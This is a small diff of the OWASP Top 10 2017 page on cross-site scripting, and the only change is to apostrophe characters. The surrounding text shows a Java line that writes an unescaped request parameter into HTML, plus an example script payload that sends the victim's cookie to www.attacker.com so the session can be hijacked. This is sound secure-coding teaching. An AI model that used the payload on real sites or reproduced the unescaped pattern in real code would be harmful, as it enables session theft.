OWASP/Top10/2017/en/0xa7-xss.md

    (String) page += "<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>";
 ```

-The attacker modifies the 'CC’ parameter in the browser to:
+The attacker modifies the 'CC' parameter in the browser to:

 ```
 ><script>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'.
 ```

-This attack causes the victim’s session ID to be sent to the attacker’s website, allowing the attacker to hijack the user’s current session.
+This attack causes the victim's session ID to be sent to the attacker's website, allowing the attacker to hijack the user's current session.

 Note that attackers can use XSS to defeat any automated CSRF defense the application might employ.